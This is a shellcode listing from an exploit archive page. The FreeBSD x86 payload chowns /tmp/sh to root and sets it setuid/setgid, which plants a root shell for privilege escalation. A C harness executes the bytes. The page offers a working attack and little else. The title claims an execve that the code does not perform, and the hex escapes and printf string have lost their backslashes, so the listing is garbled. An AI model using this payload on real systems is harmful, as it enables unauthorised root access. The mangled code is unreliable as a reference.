[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : freebsd/x86 chown 0:0 , chmod 6755 & execve /tmp/sh 44 bytes
# Published : 2004-09-26
# Author : Claes Nyberg
# Previous Title : freebsd/x86 execve /tmp/sh 34 bytes
# Next Title : freebsd/x86 connect 102 bytes
/*
* FreeBSD shellcode
* chown("/tmp/sh", 0, 0); chmod("/tmp/sh", 06755);
* 44 bytes
*
* Claes M. Nyberg 20020209
*
* <cmn@darklab.org>, <md0claes@mdstud.chalmers.se>
*/
/*************************************************************
void
main(void)
{
__asm__("
xor %eax, %eax # eax = 0
pushl %eax # string ends with NULL
pushl $0x68732f2f # push 'hs//' (//sh)
pushl $0x706d742f # push 'pmt/' (/tmp)
movl %esp, %ebx # ebx = &string[0]
push %eax # 0
push %eax # 0
push %ebx # /tmp/sh
push %eax # Dummy
mov $0x10, %al # eax = 16 = chown
int $0x80 # chown(/tmp/sh, 0, 0);
xor %eax, %eax # eax = 0
or $0xded, %ax # eax = 06755
pushl %eax # 06755
push %ebx # /tmp/sh
pushl %eax # dummy
xor %eax, %eax # eax = 0
mov $0xf, %al # eax = 15 = chmod
int $0x80 # chmod(/tmp/sh, 06755);
mov $0x1, %al # eax = 1 = exit
push %eax # exit value = 1
push %eax # Dummy
int $0x80 # exit(1);
");
}
*************************************************************/
#include <stdio.h>
#include <string.h>
static char freebsd_code[] =
"x31xc0" /* xor %eax, %eax */
"x50" /* pushl %eax */
"x68x2fx2fx73x68" /* pushl $0x68732f2f */
"x68x2fx74x6dx70" /* pushl $0x706d742f */
"x89xe3" /* movl %esp, %ebx */
"x50" /* pushl %eax */
"x50" /* pushl %eax */
"x53" /* pushl %ebx */
"x50" /* pushl %eax */
"xb0x10" /* mov $0x10, %al */
"xcdx80" /* int $0x80 */
"x31xc0" /* xor %eax, %eax */
"x66x0dxedx0d" /* or $0xded, %ax */
"x50" /* pushl %eax */
"x53" /* push %ebx */
"x50" /* pushl %eax */
"x31xc0" /* xor %eax, %eax */
"xb0x0f" /* mov $0xf, %al */
"xcdx80" /* int $0x80 */
"xb0x01" /* mov $0x1, %al */
"x50" /* push %eax */
"x50" /* push %eax */
"xcdx80"; /* int $0x80 */
static char _freebsd_code[] =
"x31xc0x50x68x2fx2fx73x68"
"x68x2fx74x6dx70x89xe3x50"
"x50x53x50xb0x10xcdx80x31"
"xc0x66x0dxedx0dx50x53x50"
"x31xc0xb0x0fxcdx80xb0x01"
"x50x50xcdx80";
void
main(void)
{
void (*code)() = (void *)_freebsd_code;
printf("strlen code: %dn", strlen(freebsd_code));
code();
}
// www.Syue.com [2004-09-26]